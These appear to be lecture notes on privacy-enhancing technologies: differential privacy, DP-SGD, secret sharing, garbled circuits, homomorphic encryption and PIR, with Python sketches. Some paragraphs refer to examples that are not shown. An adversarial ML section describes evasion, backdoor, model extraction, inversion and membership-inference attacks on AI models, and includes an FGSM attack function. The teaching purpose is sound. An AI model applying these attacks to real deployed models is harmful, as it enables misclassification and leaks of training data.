The global sensitivity of a query \(f\) is \(\Delta f = \max_{D \sim D'} |f(D) - f(D')|\) over neighbouring datasets; the Laplace mechanism outputs \(f(D) + Z\) with \(Z \sim \mathrm{Lap}(0, \Delta f / \varepsilon)\). Consider a counting query, which has \(\Delta f = 1\). For a privacy parameter \(\varepsilon = 0.5\), the Laplace mechanism adds noise \(Z \sim \mathrm{Lap}(0, 1/0.5) = \mathrm{Lap}(0, 2)\). Suppose the true count is \(f(D) = 150\). The mechanism outputs \(150 + Z\), where \(Z\) might take values such as \(-1.7\) (giving output \(148.3\)) or \(+2.7\) (giving \(152.7\)). The expected absolute error is \(\mathbb{E}[|Z|] = b = 1/\varepsilon = 2\). Increasing \(\varepsilon\) to 1.0 would halve the noise scale to \(\mathrm{Lap}(0,1)\), halving the expected error — at the cost of weaker privacy.
The analyst rounds the output to the nearest integer and reports it as the approximate count. Crucially, with high probability the output is within a few units of the true count, yet the guarantee holds: for any two adjacent datasets \(D, D'\), the ratio of output probabilities is bounded by \(e^\varepsilon = e^{0.5} \approx 1.65\).
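A sketch of the Laplace mechanism for a counting query, sampling the noise by inverse-CDF; the seed and the true count are arbitrary.

```python
import math
import random

def laplace_noise(scale: float, rng: random.Random) -> float:
    # Inverse-CDF sampling: for U uniform on (-1/2, 1/2),
    # -scale * sgn(U) * ln(1 - 2|U|) is distributed Lap(0, scale).
    u = rng.random() - 0.5
    return -scale * math.copysign(1.0, u) * math.log(1.0 - 2.0 * abs(u))

def dp_count(true_count: int, epsilon: float, rng: random.Random) -> float:
    # Counting queries have sensitivity 1, so the noise scale is 1/epsilon.
    return true_count + laplace_noise(1.0 / epsilon, rng)

rng = random.Random(7)
noisy = dp_count(150, epsilon=0.5, rng=rng)
assert abs(noisy - 150) < 50          # large deviations are exponentially rare

# Empirically, the mean absolute noise approaches b = 1/epsilon = 2:
mean_abs = sum(abs(laplace_noise(2.0, rng)) for _ in range(10_000)) / 10_000
assert 1.8 < mean_abs < 2.2
```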
Exponential mechanism (McSherry-Talwar): for non-numeric outputs, sample an output \(r\) with probability proportional to \(\exp(\varepsilon \cdot q(D, r) / 2\Delta q)\), where \(q\) is a quality score. Achieves \(\varepsilon\)-DP while maximising expected quality.
Composition Theorems
Differential privacy composes gracefully, a major advantage over syntactic approaches.
Sequential composition: running \(k\) mechanisms \(M_1, \ldots, M_k\) each with budget \(\varepsilon_i\) on the same dataset yields \((\sum \varepsilon_i)\)-DP.
Parallel composition: if each mechanism \(M_i\) operates on a disjoint subset of the data, the combined mechanism is \(\max_i \varepsilon_i\)-DP.
Advanced composition (Dwork-Rothblum-Vadhan): for \(k\) applications of an \((\varepsilon, \delta)\)-DP mechanism, the composition achieves approximately \((\varepsilon \sqrt{2k \log(1/\delta')}, k\delta + \delta')\)-DP — significantly better than the naive \(k\varepsilon\) bound.
The moments accountant (Abadi et al.) and Rényi DP framework (Mironov) give even tighter composition bounds, enabling practical DP-ML training with reasonable noise levels.
Intuitively: if a record is only included in the subsample with probability \(\gamma\), then with probability \(1 - \gamma\) the mechanism does not even see that record, bounding its influence. This privacy amplification lemma is exploited heavily in two settings: (1) DP-SGD subsamples a mini-batch of size \(B\) from \(n\) training examples at each gradient step, giving amplification factor \(\gamma = B/n\); (2) Apple’s local DP deployment collects data from only a fraction of devices per day, obtaining amplification from the subsampling. The amplification lemma means that a mechanism with moderate per-step \(\varepsilon\) can achieve strong end-to-end guarantees after many steps, which is what makes differentially private machine learning feasible.
If the company wanted to release an 11th statistic, it would already have exhausted its privacy budget (assuming a pre-set limit of \(\varepsilon_{\text{total}} = 1.0\) and ten releases at \(\varepsilon = 0.1\) each). To answer more queries within a fixed budget, the company can increase the noise scale (lowering accuracy) or invoke advanced composition, though the latter only pays off at larger \(k\): for the 10 mechanisms here with \(\varepsilon = 0.1\) and \(\delta' = 10^{-6}\), the bound is \(0.1\sqrt{20 \ln(10^6)} \approx 1.66\), actually worse than the naive 1.0, whereas for 100 such mechanisms advanced composition gives \(0.1\sqrt{200 \ln(10^6)} \approx 5.3\) against a naive bound of 10. This is the practical meaning of the “privacy budget” metaphor: you can only make finitely many queries before the cumulative privacy loss becomes unacceptable.
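The naive and advanced composition bounds can be compared directly. The helper below uses the simplified advanced-composition expression \(\varepsilon\sqrt{2k\ln(1/\delta')}\), ignoring the lower-order \(k\varepsilon(e^\varepsilon - 1)\) term; function names are illustrative.

```python
import math

def naive_eps(k: int, eps: float) -> float:
    # Basic sequential composition: budgets add linearly.
    return k * eps

def advanced_eps(k: int, eps: float, delta_prime: float) -> float:
    # Simplified advanced-composition bound (lower-order term omitted).
    return eps * math.sqrt(2 * k * math.log(1 / delta_prime))

# For few queries the naive bound is tighter; the sqrt(k) scaling of
# advanced composition wins once k grows large.
assert naive_eps(10, 0.1) < advanced_eps(10, 0.1, 1e-6)
assert advanced_eps(100, 0.1, 1e-6) < naive_eps(100, 0.1)
```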
Proof sketch. Let \(S \subseteq \mathcal{S}\) be any measurable set. Observe that \(\{f \circ M(D) \in S\} = \{M(D) \in f^{-1}(S)\}\). Since \(M\) is \((\varepsilon,\delta)\)-DP, applying the DP guarantee to the measurable set \(f^{-1}(S) \subseteq \mathcal{R}\) gives: \[ \Pr[f(M(D)) \in S] = \Pr\!\left[M(D) \in f^{-1}(S)\right] \leq e^\varepsilon \Pr\!\left[M(D') \in f^{-1}(S)\right] + \delta = e^\varepsilon \Pr[f(M(D')) \in S] + \delta. \] The key insight is that \(f^{-1}(S)\) is simply another measurable subset of \(\mathcal{R}\), so the DP guarantee applies to it directly. Since this holds for all \(S\), \(f \circ M\) is \((\varepsilon, \delta)\)-DP.
Post-processing immunity has major practical consequences: any downstream computation on a DP output — whether it is averaging, rounding, running a classification algorithm, or publishing a report — cannot degrade the privacy guarantee. Privacy is “baked in” to the output of \(M\), regardless of how the output is subsequently used.
Local vs. Central Differential Privacy
In the local model, there is no trusted curator. Each individual applies a DP randomiser to their own data before sending it to the collector, who aggregates the noisy reports. Because each individual’s report is already \(\varepsilon\)-DP, the collector learns nothing beyond what is deducible from the noisy reports. However, the price is steep: for estimating a simple proportion (fraction of users with a property), the local DP estimator’s standard error scales as \(\Theta(1/(\varepsilon\sqrt{n}))\) for small \(\varepsilon\), whereas the central DP estimator adds error of only \(O(1/(\varepsilon n))\) — effectively, matching central-model accuracy in the local model requires on the order of quadratically more users. Google’s RAPPOR (2014) and Apple’s iOS keyboard/emoji collection use local DP, accepting higher noise in exchange for not needing to trust a central server.
Real-World Deployments
| Organisation | Application | \(\varepsilon\) |
|---|---|---|
| US Census Bureau 2020 | Decennial census publication | \(\approx 17.14\) total budget |
| Google (RAPPOR) | Chrome browser statistics | Varies per query |
| Apple (iOS) | Keyboard suggestions, emoji | \(\approx 8\) (estimated) |
| — | Audience engagement API | Not disclosed |
The Census deployment sparked debate: an \(\varepsilon = 17.14\) budget distributed across many publications results in substantial noise on small geographic areas, affecting redistricting and federal funding allocation.
Differentially Private Machine Learning
Training a neural network on sensitive data risks memorisation: models can inadvertently encode and leak individual training examples (membership inference, model inversion).
DP-SGD (Abadi et al. 2016): makes stochastic gradient descent differentially private:
- Per-example gradient clipping: clip each individual’s gradient to L2 norm \(C\) (bounding sensitivity).
- Noise addition: add Gaussian noise \(\mathcal{N}(0, \sigma^2 C^2 \mathbf{I})\) to the summed gradient.
- Moments accountant: track \(\varepsilon\) accumulation across training steps with tight composition.
The privacy-utility trade-off is significant: DP-SGD models often have lower accuracy than non-private counterparts, especially at small \(\varepsilon\). Privacy amplification by subsampling (mini-batches) and amplification by shuffling help recover some utility.
Each step proceeds as follows: (1) sample a mini-batch \(S\) of \(B = 256\) examples uniformly at random from the \(n = 10{,}000\) training examples (subsampling rate \(\gamma = 256/10{,}000 = 0.0256\)); (2) compute the gradient of the loss for each example individually (per-example gradients, not the standard batch gradient); (3) clip each per-example gradient vector to L2 norm \(\leq C = 1.0\), bounding the contribution of any single training example; (4) sum the clipped gradients and add Gaussian noise \(\mathcal{N}(0,\, \sigma^2 C^2 \mathbf{I}) = \mathcal{N}(0,\, (1.1)^2 \mathbf{I})\); (5) divide by \(B\) to form the noisy gradient estimate and update model parameters.
Privacy cost: using the moments accountant (or the Rényi DP accounting in PyTorch Opacus), \(T = 2{,}000\) steps with these parameters yields approximately \((\varepsilon, \delta) = (3.0, 10^{-5})\)-DP. Apple’s keyboard next-word prediction and Google’s Gboard emoji suggestion models are trained with variants of this procedure, typically targeting \(\varepsilon \approx 8\) (a more relaxed privacy guarantee that allows higher accuracy). At \(\varepsilon = 3\), the model typically loses 2–5 percentage points of accuracy relative to non-private training, depending on the architecture and dataset size. The accuracy gap shrinks as \(n\) grows: larger datasets tolerate more noise.
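The clip-sum-noise core of a DP-SGD step can be sketched in plain Python on a toy two-parameter model; the per-example gradients below are made up for illustration.

```python
import math
import random

def clip(grad, C):
    # Clip a per-example gradient to L2 norm at most C.
    norm = math.sqrt(sum(g * g for g in grad))
    scale = min(1.0, C / norm) if norm > 0 else 1.0
    return [g * scale for g in grad]

def dp_sgd_step(per_example_grads, C, sigma, rng):
    # One DP-SGD gradient estimate: clip each example's gradient, sum,
    # add N(0, sigma^2 C^2) noise per coordinate, then average.
    B = len(per_example_grads)
    dim = len(per_example_grads[0])
    summed = [0.0] * dim
    for g in per_example_grads:
        for j, v in enumerate(clip(g, C)):
            summed[j] += v
    return [(s + rng.gauss(0.0, sigma * C)) / B for s in summed]

rng = random.Random(0)
grads = [[3.0, 4.0], [0.1, -0.2], [-1.0, 1.0]]   # toy per-example gradients
noisy_grad = dp_sgd_step(grads, C=1.0, sigma=1.1, rng=rng)
assert len(noisy_grad) == 2
# The [3, 4] gradient (norm 5) was clipped to norm 1, bounding any single
# example's influence on the update.
assert math.isclose(math.hypot(*clip([3.0, 4.0], 1.0)), 1.0)
```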
RDP has three key properties that make it the preferred accounting framework for DP-ML: (1) tight sequential composition — if \(M_1\) satisfies \((\alpha, \varepsilon_1)\)-RDP and \(M_2\) satisfies \((\alpha, \varepsilon_2)\)-RDP, then \((M_1, M_2)\) satisfies \((\alpha, \varepsilon_1 + \varepsilon_2)\)-RDP; (2) conversion to \((\varepsilon, \delta)\)-DP — any \((\alpha, \varepsilon_\alpha)\)-RDP mechanism is also \((\varepsilon_\alpha + \frac{\log(1/\delta)}{\alpha - 1}, \delta)\)-DP for any \(\delta > 0\); (3) Gaussian mechanism — the Gaussian mechanism with noise \(\mathcal{N}(0, \sigma^2)\) applied to a function with sensitivity 1 satisfies \((\alpha, \frac{\alpha}{2\sigma^2})\)-RDP. Combining (1) and (3): after \(T\) steps, privacy cost is \((\alpha, T\alpha / (2\sigma^2))\)-RDP, converted to \((\varepsilon, \delta)\)-DP by (2). This three-step accounting — implemented in PyTorch Opacus and TensorFlow Privacy — is how practitioners compute the DP guarantee for large-scale model training.
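The three-step accounting can be implemented in a few lines, minimising the converted \((\varepsilon, \delta)\) guarantee over a grid of Rényi orders \(\alpha\). Subsampling amplification is ignored here, so this sketch is looser than the accountants in Opacus or TensorFlow Privacy.

```python
import math

def rdp_to_dp(T: int, sigma: float, delta: float) -> float:
    # T compositions of the Gaussian mechanism (sensitivity 1, noise sigma):
    # each step is (alpha, alpha / (2 sigma^2))-RDP; composition adds the
    # epsilons; conversion gives eps = T*alpha/(2 sigma^2) + ln(1/delta)/(alpha-1).
    # Minimise the converted epsilon over a grid of Renyi orders alpha.
    best = float("inf")
    for i in range(1, 1000):
        alpha = 1.0 + i / 10.0
        eps = T * alpha / (2 * sigma ** 2) + math.log(1 / delta) / (alpha - 1)
        best = min(best, eps)
    return best

# More noise (larger sigma) or fewer steps yields a smaller epsilon.
assert rdp_to_dp(100, 10.0, 1e-5) < rdp_to_dp(1000, 10.0, 1e-5)
assert rdp_to_dp(100, 20.0, 1e-5) < rdp_to_dp(100, 10.0, 1e-5)
```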
The deployment triggered an intense methodological debate. Demographers argued that the noise introduced at the block level — the smallest geographic unit — was large enough to distort small-area statistics critical for congressional redistricting and federal funding allocation. Some researchers found that small minority communities’ population counts were significantly distorted, potentially affecting their political representation. The Census Bureau conducted multiple accuracy assessments and adjusted parameters in response. The episode illustrates a tension that is fundamental to applied DP: the mathematics determines the privacy-accuracy tradeoff for a given \(\varepsilon\), but choosing \(\varepsilon\) is a societal and political decision, not a purely technical one. There is no universally “correct” \(\varepsilon\).
Federated learning trains models on data that never leaves user devices. The server aggregates model updates (gradients), not raw data. Combining federated learning with DP-SGD (and secure aggregation) provides stronger end-to-end privacy guarantees.
The Exponential Mechanism and Report Noisy Max
The Laplace and Gaussian mechanisms apply to numeric queries. For non-numeric outputs — selecting a record from a database, generating a private synthetic dataset, choosing a word from a vocabulary — the exponential mechanism is the canonical approach.
The sensitivity is \(\Delta q = 1\) (adding one person changes the rank of any value by at most 1). The exponential mechanism samples \(r\) with probability \(\propto \exp(\varepsilon \cdot q(D,r) / 2)\). For large \(\varepsilon\), probability concentrates sharply around the true median; for small \(\varepsilon\), the distribution spreads. The expected error is \(O(\log |\mathcal{R}| / \varepsilon)\); with \(|\mathcal{R}| = 100\), roughly \(\ln(100)/\varepsilon \approx 4.6/\varepsilon\) — logarithmic in the range size, not linear. Compare with the Laplace mechanism applied to the rank index: Laplace noise on a rank would need clipping and has no natural sensitivity-preserving formulation for the median. The exponential mechanism is the principled general tool.
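A minimal sketch of the exponential mechanism for the median (the utility function is the negative distance of a candidate's rank from the median rank, sensitivity 1; the domain and dataset are illustrative):

```python
import math, random

def private_median(data, domain, eps):
    """Exponential mechanism: sample r with probability
    proportional to exp(eps * q(D, r) / 2), where
    q(D, r) = -|#{x <= r} - n/2| has sensitivity 1."""
    n = len(data)
    def q(r):
        return -abs(sum(1 for x in data if x <= r) - n / 2)
    weights = [math.exp(eps * q(r) / 2) for r in domain]
    u = random.uniform(0, sum(weights))
    acc = 0.0
    for r, w in zip(domain, weights):
        acc += w
        if u <= acc:
            return r
    return domain[-1]
```

With large \(\varepsilon\) the sampled value sits essentially on the true median; with small \(\varepsilon\) the distribution flattens over the domain.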
Local DP Mechanisms in Practice
The most deployed local DP mechanisms are designed for frequency estimation — estimating how often each value in a domain appears across a population.
RAPPOR achieves \(\varepsilon\)-LDP with \(\varepsilon = 2\ln\frac{1-q}{p}\) from the instantaneous randomisation step. It was deployed to collect statistics on Chrome’s home page URL, default search engine, and software configuration — data types where direct logging would be considered highly privacy-invasive, but where population-level statistics are valuable for product improvement.
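RAPPOR's core primitive is randomised response. A minimal sketch of the basic single-bit version (Warner-style randomised response, not RAPPOR's full Bloom-filter pipeline) together with the standard unbiased frequency estimator:

```python
import math, random

def rr_report(bit, eps):
    """Tell the truth with probability e^eps / (1 + e^eps): eps-LDP."""
    p_true = math.exp(eps) / (1 + math.exp(eps))
    return bit if random.random() < p_true else 1 - bit

def rr_estimate(reports, eps):
    """Unbiased estimate of the true frequency of 1s from noisy reports."""
    p_true = math.exp(eps) / (1 + math.exp(eps))
    mean = sum(reports) / len(reports)
    return (mean - (1 - p_true)) / (2 * p_true - 1)
```

No individual report is trustworthy, yet the population-level frequency is recoverable — exactly the deployment model of Chrome's RAPPOR.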
Adversarial Machine Learning
Models trained on sensitive data are themselves privacy and security threats.
Evasion attacks craft adversarial examples: inputs perturbed imperceptibly (to humans) that cause misclassification. FGSM (Goodfellow et al. 2014): perturb input by \(\eta \cdot \text{sign}(\nabla_x \mathcal{L})\). Carlini-Wagner attack: optimisation-based; finds minimal perturbation achieving target misclassification. Adversarial robustness and clean accuracy are often in tension.
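FGSM is easiest to see on a model simple enough to differentiate by hand. The sketch below attacks a binary logistic regression classifier (the weights and inputs are made up for illustration):

```python
import math

def fgsm_attack(x, w, b, y, eta):
    """FGSM on binary logistic regression with label y in {-1, +1}:
    loss = log(1 + exp(-y * (w.x + b))); perturb x by eta * sign(d loss / d x)."""
    margin = y * (sum(wi * xi for wi, xi in zip(w, x)) + b)
    scale = -y / (1.0 + math.exp(margin))   # d loss / d (w.x + b)
    sign = lambda v: (v > 0) - (v < 0)
    return [xi + eta * sign(scale * wi) for wi, xi in zip(w, x)]
```

A perturbation of size \(\eta\) per coordinate, aligned with the loss gradient's sign, moves the input across the decision boundary far more efficiently than random noise of the same magnitude.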
Poisoning attacks corrupt the training data. Backdoor attacks embed a trigger (e.g., a specific pixel pattern) such that the model predicts a target class whenever the trigger is present, while behaving normally on clean inputs.
Model extraction: query the model API to reconstruct a functionally equivalent model, stealing intellectual property and enabling white-box attacks against what was a black-box system.
Model inversion: given a model that outputs class probabilities, recover approximate training examples. Fredrikson et al. (2015) reconstructed facial images from a face recognition API.
Membership inference (Shokri et al. 2017): determine whether a specific record was in the training set by exploiting the observation that models tend to have higher confidence on training examples. DP-SGD provides formal membership inference resistance.
This connection to differential privacy is not coincidental: the Gaussian mechanism is the core of both randomised smoothing and DP-SGD. The same noise distribution that provides privacy amplification in DP-SGD provides certified robustness in randomised smoothing. The \((\varepsilon, \delta)\)-DP guarantee of the Gaussian mechanism directly implies a certified robustness radius. This deep connection has spurred research into “privacy as robustness” — models trained with DP-SGD are more robust to adversarial examples and data poisoning as a side effect of the clipping and noising procedures, beyond the formal membership inference guarantee.
Chapter 8: Multi-Party Computation, Homomorphic Encryption, and Surveillance
Secret Sharing
Shamir’s secret sharing (1979) solves the problem of distributing a secret \(s\) among \(n\) parties such that any \(k\) of them can reconstruct it, while any \(k-1\) or fewer learn nothing. The construction uses polynomial interpolation over \(\mathbb{F}_p\):
Choose a random polynomial \(f(x) = s + a_1 x + \cdots + a_{k-1} x^{k-1}\) with \(f(0) = s\). Distribute \((i, f(i))\) to party \(i\). Any \(k\) points uniquely determine \(f\) (and hence \(s\)) by Lagrange interpolation; fewer than \(k\) points are statistically independent of \(s\).
Applications include distributed key management (requiring multiple administrators to reconstruct a root key), secure voting, and as a building block in MPC.
Worked example (\(n = 3\) parties, threshold \(k = 2\), field \(\mathbb{F}_{101}\)): choose a random degree-\((k-1) = 1\) polynomial with \(f(0) = s = 42\). Pick the random coefficient \(a_1 = 7\). The polynomial is \(f(x) = 42 + 7x\).
Compute the three shares:
\[ s_1 = f(1) = 42 + 7 = 49, \qquad s_2 = f(2) = 42 + 14 = 56, \qquad s_3 = f(3) = 42 + 21 = 63. \]
Distribute share \(s_i\) to party \(i\). Now reconstruct from any two, say parties 1 and 2, using Lagrange interpolation:
\[ f(0) = s_1 \cdot \frac{0 - 2}{1 - 2} + s_2 \cdot \frac{0 - 1}{2 - 1} = 49 \cdot \frac{-2}{-1} + 56 \cdot \frac{-1}{1} = 49 \times 2 - 56 = 98 - 56 = 42. \checkmark \]
Verify from parties 1 and 3:
\[ f(0) = 49 \cdot \frac{0-3}{1-3} + 63 \cdot \frac{0-1}{3-1} = 49 \cdot \frac{-3}{-2} + 63 \cdot \frac{-1}{2} = \frac{147}{2} - \frac{63}{2} = \frac{84}{2} = 42. \checkmark \]
A single share, say \(s_1 = 49\), reveals nothing: for any claimed secret \(s' \in \{0, 1, \ldots, 100\}\) there exists a polynomial \(g(x) = s' + a_1' x\) with \(g(1) = 49\) (namely \(a_1' = 49 - s' \bmod 101\)), so every secret is equally consistent with the observed share. This is the perfect secrecy of Shamir’s scheme.
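The scheme translates directly to code. A sketch over a large prime field (the Mersenne prime modulus is an arbitrary illustrative choice):

```python
import random

P = 2**127 - 1  # a Mersenne prime; shares live in F_P

def make_shares(secret, n, k, p=P):
    """Random degree-(k-1) polynomial with f(0) = secret; share i is (i, f(i))."""
    coeffs = [secret] + [random.randrange(p) for _ in range(k - 1)]
    f = lambda x: sum(c * pow(x, j, p) for j, c in enumerate(coeffs)) % p
    return [(i, f(i)) for i in range(1, n + 1)]

def reconstruct(shares, p=P):
    """Lagrange interpolation at x = 0 from any k shares."""
    secret = 0
    for xi, yi in shares:
        num, den = 1, 1
        for xj, _ in shares:
            if xj != xi:
                num = num * (-xj) % p
                den = den * (xi - xj) % p
        secret = (secret + yi * num * pow(den, p - 2, p)) % p  # Fermat inverse
    return secret
```

Any \(k\) shares reconstruct the secret; the choice of which \(k\) is irrelevant.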
Multi-Party Computation
MPC enables \(n\) parties holding private inputs \(x_1, \ldots, x_n\) to jointly compute a function \(f(x_1, \ldots, x_n)\) while revealing only the output — no party learns another’s input beyond what is implied by the output.
| \(a\) | \(b\) | \(a \wedge b\) |
|---|---|---|
| 0 | 0 | 0 |
| 0 | 1 | 0 |
| 1 | 0 | 0 |
| 1 | 1 | 1 |
Alice creates four ciphertexts: \(\mathsf{Enc}_{k_a^0, k_b^0}(k_{\text{out}}^0)\), \(\mathsf{Enc}_{k_a^0, k_b^1}(k_{\text{out}}^0)\), \(\mathsf{Enc}_{k_a^1, k_b^0}(k_{\text{out}}^0)\), \(\mathsf{Enc}_{k_a^1, k_b^1}(k_{\text{out}}^1)\), and shuffles them randomly. She sends Bob the shuffled garbled table and her label for her input \(a\) (e.g., if \(a=1\), she sends \(k_a^1\)). Bob uses oblivious transfer to obtain \(k_b^{b}\) — the label for his input \(b\) — without Alice learning \(b\). Bob now tries all four ciphertexts; exactly one decrypts successfully (the one matching the labels he holds), revealing \(k_{\text{out}}^{a \wedge b}\). Alice tells Bob which label corresponds to output 1. Bob learns the output \(a \wedge b\) but cannot determine \(a\); Alice learns nothing about \(b\).
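The garbled table above can be sketched with a toy double-key cipher: a SHA-256 one-time pad plus a zero-tag so the evaluator can recognise the one decryptable row. This is for illustration only; real garbling schemes use AES with optimisations such as point-and-permute.

```python
import os, random, hashlib

TAG = b"\x00" * 16  # known suffix marks the single valid row

def enc(ka, kb, label):
    pad = hashlib.sha256(ka + kb).digest()          # 32-byte pad for label||TAG
    return bytes(x ^ y for x, y in zip(label + TAG, pad))

def dec(ka, kb, ct):
    pad = hashlib.sha256(ka + kb).digest()
    pt = bytes(x ^ y for x, y in zip(ct, pad))
    return pt[:16] if pt[16:] == TAG else None      # wrong keys fail w.p. 1 - 2^-128

def garble_and_gate():
    """Two random 16-byte labels per wire; one ciphertext per truth-table row."""
    labels = {w: (os.urandom(16), os.urandom(16)) for w in ("a", "b", "out")}
    table = [enc(labels["a"][x], labels["b"][y], labels["out"][x & y])
             for x in (0, 1) for y in (0, 1)]
    random.shuffle(table)
    return labels, table

def evaluate(table, ka, kb):
    """Exactly one row decrypts under the labels the evaluator holds."""
    for ct in table:
        label = dec(ka, kb, ct)
        if label is not None:
            return label
```

The evaluator holding one label per input wire learns only the output label, matching the privacy argument in the text.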
Oblivious transfer (OT): a protocol where the sender holds two messages \(m_0, m_1\) and the receiver chooses \(b \in \{0,1\}\); the receiver learns \(m_b\) without learning \(m_{1-b}\), and the sender does not learn \(b\). OT is a fundamental building block for MPC.
Security models: semi-honest (honest-but-curious) adversaries follow the protocol but try to infer additional information from their view; malicious adversaries can deviate arbitrarily. Secure MPC against malicious adversaries requires additional mechanisms (e.g., zero-knowledge proofs of correct behaviour), incurring higher overhead.
Oblivious RAM (ORAM) hides the access pattern by ensuring that the sequence of physical memory accesses observed by the server is computationally indistinguishable from a uniformly random sequence, regardless of the logical access pattern. The key insight of Path ORAM (Stefanov et al. 2013) is to arrange data in a binary tree of \(N\) leaves, map each block to a randomly chosen leaf, and always read and re-encrypt the entire path from root to that leaf on each access — even if only one block on the path is relevant. After each access, the block is remapped to a fresh random leaf and re-encrypted.
Cost: Path ORAM reads and writes \(O(\log N)\) blocks per logical access, using a small client-side stash; the bandwidth overhead is thus \(O(\log N)\) blocks (\(O(\log^2 N)\) bits for small block sizes). This is far cheaper than the naive approach of downloading the entire database. ORAM-style techniques are used in practice for private contact discovery (Signal's service lets clients look up whether their contacts use Signal without the server learning which contacts were queried) and as a building block in secure enclave computing (Intel SGX programs use ORAM to mitigate cache side-channel attacks).
The Schnorr identification protocol is a simple ZKP for discrete log: to prove knowledge of \(x\) with \(h = g^x\), the prover sends \(r = g^v\) (random \(v\)), the verifier challenges with \(c\), and the prover responds with \(s = v - cx \bmod q\). The verifier checks \(g^s h^c = r\). Modern systems use non-interactive ZKPs via the Fiat-Shamir transform (replace the verifier’s random challenge with a hash of the commitment).
Industrial-scale ZK systems go far beyond identification: zk-SNARKs (succinct non-interactive arguments of knowledge) prove arbitrary NP computations in \(O(1)\) proof size, used by the Zcash cryptocurrency (private transactions) and Ethereum layer-2 rollups. zk-STARKs are transparent (no trusted setup) and post-quantum secure, used by StarkNet. Applications: (1) privacy-preserving blockchains; (2) proving a machine learning model was trained on certified data without revealing the training data; (3) age verification — proving “I am over 18” without revealing the birthdate, using a ZKP over the certificate-signed birthdate from a government-issued ID.
Federated learning reduces privacy risk but does not eliminate it: gradient inversion attacks (Zhu et al. 2019) demonstrated that a curious server can, in some settings, reconstruct training images pixel-by-pixel from a single gradient update. The attack formulates reconstruction as an optimisation problem: find input \(x'\) such that \(\nabla_\theta \mathcal{L}(f_\theta(x'), y') \approx \nabla_\theta \mathcal{L}(f_\theta(x), y)\). On small models and batches of 1–8 images, reconstruction is near-perfect. Defences include larger batch sizes (gradients of many examples cancel), DP-SGD (noising gradients), and secure aggregation (the server only sees the sum of all device gradients, never any individual gradient). Combining federated learning with DP-SGD and secure aggregation gives end-to-end formal privacy guarantees — the architecture deployed by Apple (QuickType keyboard) and Google (GBoard).
Homomorphic Encryption
Homomorphic encryption allows computation on encrypted data. Given encryptions \(\text{Enc}(a)\) and \(\text{Enc}(b)\), a server can compute \(\text{Enc}(f(a, b))\) for some class of functions \(f\), without learning \(a\) or \(b\).
| Type | Supported operations | Examples |
|---|---|---|
| Partial (PHE) | Addition or multiplication | Paillier (additive), ElGamal (multiplicative) |
| Somewhat (SHE) | Bounded-depth circuits | BFV, BGV |
| Fully (FHE) | Any circuit | Gentry 2009 (ideal lattices); CKKS (approximate reals) |
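Paillier's additive homomorphism from the table can be demonstrated with toy parameters (tiny primes for illustration only; real deployments use moduli of 2048 bits or more):

```python
import math, random

# Toy Paillier parameters -- insecure, for illustration
p, q = 17, 19
n, n2 = p * q, (p * q) ** 2
g = n + 1
lam = math.lcm(p - 1, q - 1)

def L(x):
    return (x - 1) // n

mu = pow(L(pow(g, lam, n2)), -1, n)   # precomputed decryption constant

def encrypt(m):
    r = random.randrange(1, n)
    while math.gcd(r, n) != 1:
        r = random.randrange(1, n)
    return pow(g, m, n2) * pow(r, n, n2) % n2

def decrypt(c):
    return L(pow(c, lam, n2)) * mu % n

# Additive homomorphism: multiplying ciphertexts adds plaintexts mod n
c_sum = encrypt(12) * encrypt(30) % n2
```

The server multiplying two ciphertexts never sees 12 or 30, yet the result decrypts to their sum.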
Gentry’s FHE construction (2009) was a theoretical breakthrough: he showed that somewhat homomorphic encryption could be made fully homomorphic by bootstrapping — homomorphically evaluating the decryption circuit to refresh the noise. Modern FHE schemes (CKKS for approximate arithmetic on real/complex numbers, BFV/BGV for exact integers) are based on the Learning With Errors (LWE) or Ring-LWE hardness assumption.
The practical landscape has improved substantially. Current FHE schemes target specific workloads: CKKS (Cheon-Kim-Kim-Song, 2017) supports approximate arithmetic over real and complex numbers — well-suited for machine learning inference on encrypted data. BFV and BGV support exact integer arithmetic — useful for private statistics. TFHE enables gate-by-gate bootstrapping, fast for small circuits. Google (FHE transpiler), Microsoft (SEAL), and IBM (HElib) all maintain production-grade FHE libraries. Practical deployments include private contact discovery (computing set intersections without revealing either party’s contact list), private genomic analysis, and outsourced ML inference where the server learns neither the model nor the query. Overhead remains large (100× to 10000× versus plaintext), but specialised hardware accelerators and algorithmic improvements continue to close the gap.
Beyond the deployments above, applications include medical data analysis without exposing patient records to cloud providers and private set intersection.
Private Information Retrieval
PIR allows a client to retrieve the \(i\)-th element from a database of \(n\) elements without the server learning \(i\). Trivial PIR requires downloading the whole database (communication cost \(O(n)\)).
Information-theoretic PIR with \(k \geq 2\) non-colluding servers achieves polylogarithmic communication (Chor et al. 1995). Computational PIR with a single server uses HE to achieve sublinear communication under cryptographic assumptions. The communication-computation trade-off is an active research area; deployments include private browsing history and private contact discovery (Signal uses PIR-adjacent techniques for contact intersection).
Alice picks a uniformly random subset \(S \subseteq [n]\) and sends \(S\) to S1 and \(S \Delta \{i\}\) (the symmetric difference) to S2. Each server responds with the XOR of the bits indexed by the received set: S1 sends \(a_1 = \bigoplus_{j \in S} x_j\) and S2 sends \(a_2 = \bigoplus_{j \in S \Delta \{i\}} x_j\). Alice computes \(a_1 \oplus a_2 = x_i\), the desired bit. Correctness: \(a_1 \oplus a_2 = \bigoplus_{j \in S} x_j \oplus \bigoplus_{j \in S \Delta \{i\}} x_j = x_i\) (the XOR telescopes, leaving only \(x_i\)).
Privacy: S1 sees only \(S\), a uniformly random subset — independent of \(i\). S2 sees \(S \Delta \{i\}\), also a uniformly random subset (because \(S\) was random). Neither server can distinguish this query from one for any other index. Communication cost: \(O(n)\) bits per server (to describe the subsets), which is not better than downloading the whole database. Sublinear PIR requires recursion or algebraic constructions, achieving \(O(n^{1/3})\) communication at the cost of additional servers.
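The two-server scheme is a direct transcription of the protocol above into code (both servers simulated locally here):

```python
import random

def make_queries(n, i):
    """Uniformly random subset S for server 1; S symmetric-difference {i} for server 2."""
    S = {j for j in range(n) if random.random() < 0.5}
    return S, S ^ {i}

def server_answer(db, subset):
    """Each server XORs the database bits indexed by its subset."""
    ans = 0
    for j in subset:
        ans ^= db[j]
    return ans

def retrieve(db, i):
    """Client combines the two answers; the XOR telescopes to db[i]."""
    q1, q2 = make_queries(len(db), i)
    return server_answer(db, q1) ^ server_answer(db, q2)
```

Each server individually sees a uniformly random subset, so neither learns anything about \(i\) — provided they do not collude.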
The BGW Protocol and Arithmetic Circuits
For multi-party computation over arithmetic operations (addition, multiplication of numbers rather than bits), the BGW protocol (Ben-Or, Goldwasser, Wigderson 1988) provides information-theoretic MPC for \(n\) parties against up to \(t < n/3\) malicious corruptions (or \(t < n/2\) semi-honest).
